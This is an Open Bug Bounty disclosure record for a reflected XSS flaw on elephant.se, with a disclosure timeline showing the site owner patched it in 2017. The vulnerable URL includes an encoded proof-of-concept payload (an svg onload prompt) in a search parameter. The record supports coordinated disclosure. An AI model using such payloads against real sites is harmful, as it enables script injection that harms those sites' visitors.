elephant.se XSS vulnerability

2017-03-18T16:12:00
ID OBB:219586
Type openbugbounty
Reporter porthunter
Modified 2017-06-18T06:30:00

Description

Vulnerable URL:
http://www.elephant.se/google_search.php?domains=www.elephant.se&q;=&sitesearch;=www.elephant.se&client;=pub-9171508190134279&forid;=1&channel;=6734127506&ie;=ISO-8859-1&oe;=ISO-8859-1&cof;=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BLH%3A0%3BLW%3A0%3BL%3Ahttp%3A%2F%2Fwww.elephant.se%2Flogos%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.elephant-news.com%3BLP%3A1%3BFORID%3A11&hl;=en〈=en&q;=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&x;=9&y;=10
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1400108
VIP website status:| No
Check elephant.se SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 March, 2017 16:12 GMT
Generic security notifications sent to website owner| 18 March, 2017 16:14 GMT
Vulnerability details disclosed by researcher| 17 June, 2017 16:14 GMT
Vulnerability patched by the website owner| 18 June, 2017 06:30 GMT